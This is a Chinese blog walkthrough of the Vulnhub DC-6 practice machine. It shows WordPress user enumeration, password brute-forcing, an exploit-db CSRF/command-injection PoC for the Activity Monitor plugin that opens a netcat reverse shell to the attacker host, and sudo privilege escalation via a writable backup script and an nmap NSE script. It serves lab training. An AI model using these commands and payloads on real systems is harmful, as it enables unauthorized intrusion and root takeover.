DC6-靶机

最新推荐文章于 2024-03-26 16:08:20 发布
最新推荐文章于 2024-03-26 16:08:20 发布
阅读量1.6k 收藏 4
点赞数 1
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/auuuuuuuu/article/details/102827273
版权

下载地址

下面是作者的提示,和爆破的字典有关

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

配置的环境:

kali:192.168.25.131         DC6-靶机 和 kali 在同一C段

 

渗透

nmap扫描网段,发现存活主机

nmap -sP 192.168.25.0/24

 

发现主机 192.168.25.137,判定为DC6-靶机,继续使用nmap获取详细信息

nmap -A -p 1-65535 192.168.25.137

 

靶机为wordpress系统,有ssh,配置域名解析

 

wpscan扫描,查找站点的所有用户

wpscan --url http://wordy/ -e

本地wpscan不能用,一直显示如下,浏览器也可以访问- - 

 

参考别人的得到用户名如下

admin sarah  graham jens  mark

再依据作者的提示生成爆破密码的字典

然后爆破登录页面,用什么都可以 burp hydra msf均可

最后得到账号密码      mark  helpdesk01

 

wordpress后台默认地址 、/wp-admin  成功登录   普通用户权限

 

 

wordpress一般都是插件出问题,发现activity monitor插件,搜索

https://www.exploit-db.com/exploits/45274
<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr|nc 192.168.25.131 4444 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

action修改为对应的ip地址,value 对应值修改成我们想要执行的命令,这里反弹shell~

nc监听

创建html访问点击

 

成功!

 

使用Python得到一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

 

翻翻目录文件,在/home/mark/stuff里面找到账号密码

graham  GSo7isUM1D4

 

SSH远程连接,成功登陆

ssh graham@192.168.25.137

 

最后一步,提权

老样子,sudo看看

 

发现 backups.sh脚本,且 graham的特权可以以jens用户身份免密码执行/home/jens/backups.sh这个脚本

cat查看,发现为打包压缩命令

 

查看脚本权限,在当前用户下有读写权限,修改脚本内容

 

我们在末尾增加/bin/bash,当执行时可以获得jens的shell。

echo "/bin/bash" >>/home/jens/backups.sh

 

cd /home/jens/
sudo -u jens ./backups.sh

 

查看jens的特权,发现可以免密码执行/usr/bin/nmap

 

nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)

利用过程:写入一个执行bash的nmap脚本,运行

echo 'os.execute("/bin/sh")' >get_root.nse
sudo nmap --script=/home/jens/get_root.nse

 

 

~下得到flag!

 

总结:和之前的类似,作者在爆破时还提供字典提示,适合练手~

 

 

 

hackersb123
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rockyou.txt.zip
06-24
1400万+密码、平时自己用、还是能够破解大部分的密码的
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC靶机系列:DC-6
Ays.Ie的博客
02-28 503
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC-6靶场实战
最新发布
qq_42754807的博客
03-26 745
DC-6靶场实战
DC-6靶机
Flamingo1998的博客
02-23 186
DC-6靶机
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1735
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
vulnhub靶场之DC-6
qq_58091216的博客
01-11 962
只有一个flag。
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-6靶机渗透测试
今天不学习 明天变垃圾
04-22 385
DC-6
渗透测试学习之靶机DC-6
xdbzdgx的博客
11-28 4854
1.下载靶机 本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-6的下载地址为DC: 6 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-6只有一个flag。 在VMware加载成功之后并开启,建议把DC-6靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
靶机7 DC-6(过程超详细)
honest_gg的博客
09-26 2354
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
看完这篇 教你玩转渗透测试靶机vulnhub——DC6
Aluxian_的博客
03-28 5112
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解:③:漏洞发现:④:漏洞利用:⑤:提权:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC6,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https
DC-6靶机渗透测试详细教程
jennycisp的博客
12-14 907
hosts定向wpscan枚举账号(因为是WordPress博客)wpscan账号密码爆破dirb目录扫描得到admin登录地址发现命令注入漏洞使用burp抓包修改数据反弹shell打开交互模式 python -c ‘import pty;进入到home目录查看DC-6的用户目录发现graham账号的密码,进行ssh登录成功使用sudo -l查看权限利用命令脚本转换到jens用户发现可执行root的文件为nmap创建一个nmap文件执行脚本只想nmap文件执行脚本获取到root。
DC-6的靶机渗透
m0_74950307的博客
10-27 76
pty.spawn("/bin/bash")' 命令的用途是在某些情况下改进当前终端的功能和体验。将使用 Bash shell 来执行其中的命令,也就是该脚本进去了虚拟终端,我们可以使用虚拟终端来控制它。9.获得了password和user的密码集,那么就可以进行爆破,可以使用burp也可以使用wpscan。dc靶机的网站:http://wordy/以及登录界面:http://wordy/wp-admin/".sh" 是Shell脚本文件的常见文件扩展名,它指示该文件是使用Shell编程语言编写的脚本。
靶机实战-DC-6
滕财然的博客
03-03 790
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 664
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值